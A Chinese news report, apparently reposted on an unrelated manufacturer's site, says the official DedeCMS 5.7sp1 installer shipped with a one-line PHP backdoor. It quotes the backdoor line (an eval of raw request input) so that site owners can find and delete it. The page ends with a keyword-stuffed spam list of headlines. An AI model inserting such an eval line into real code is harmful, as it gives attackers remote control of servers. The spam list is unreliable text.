DedeCMS官方版本惊曝后门360紧急推出安全检测
发布时间:2020-02-19 05:06:01
阅读:次
来源:纸碗厂家
日前,织梦内容管理系统(DedeCMS)遭乌云漏洞平台曝光称,DedeCMS 5.7sp1官方安装包被黑客植入后门。经360安全检测平台检测,该后门确实曾一度出现在织梦官网版本中。为此,360于当天紧急推出DedeCMS后门检测服务,并已对大批中招网站发出邮件报警。
360网站安全检测平台服务网址:http://webscan.360.cn
图1:DedeCms被植入的后门代码
据悉,DedeCMS正广泛应用于众多企业网站、政府网站、高校网站及个人网站上,是国内用户量最大的PHP类CMS系统。360安全工程师分析发现,此次DedeCMS曝出的后门名为“一句话后门”,其恶意代码存在于DedeCMS购物车类文件中,凡是调用该购物车类的文件均会触发后门,从而导致整个网站甚至服务器遭黑客进一步控制。
360建议,使用DedeCMS的网站站长应立刻检测include/shoper.class.php文件中是否存在后门代码“@eval(file_get_contents('php://input'));”,如存在应删除该行代码,如不存在则证明没有该“一句话后门”。
作为开源软件,DedeCMS此次曝出后门并非个例。因为在国际上,Linux等多款著名的开源软件也曾遭黑客植入后门。不过,乌云漏洞平台公开的织梦官方邮件显示,织梦开发团队否认了产品曾被植入后门,但其官网上的DedeCMS版本在3月21日中午悄然进行了修改。
相关阅读
- 湖北宜昌做好加减法推动化工产业转型升级二手仪器扣件驱动装置液压机卸扣Frc
- 美国用玉米心制食品盒领带音乐称重设备学生书包中式墓碑Frc
- 扬州大学研制出新型细菌检测试剂盒焦炭炉料肥皂臭氧设备中央控制叶滤机Frc
- 西南市场纺织纱布本周行情熨平机煮制锅包装纸板清洗枪中频炉Frc
- 数字出版技术有助重构产业金三角0雷管高州瓶盖模具滚压机丝印设备Frc
- 华泰集团为新闻战线员工捐赠口罩缸体平板电脑莲花插交通综合蓝牙天线Frc
- 亚洲ABS报价大幅上调玻璃窗白城玻璃清洁驱动轮柴油机Frc
- 浅谈快速成型技术在工业设计中的应用执行器天平仪器家用茶具空调机家具涂料Frc
- 芬兰拒绝进口中国产DimianAG牌塑料高头车盖形螺母专业锅炉缠绕膜高压胶管Frc
- 金龙期货沪胶跌停空头趋势极为强劲玻璃窗白城玻璃清洁驱动轮柴油机Frc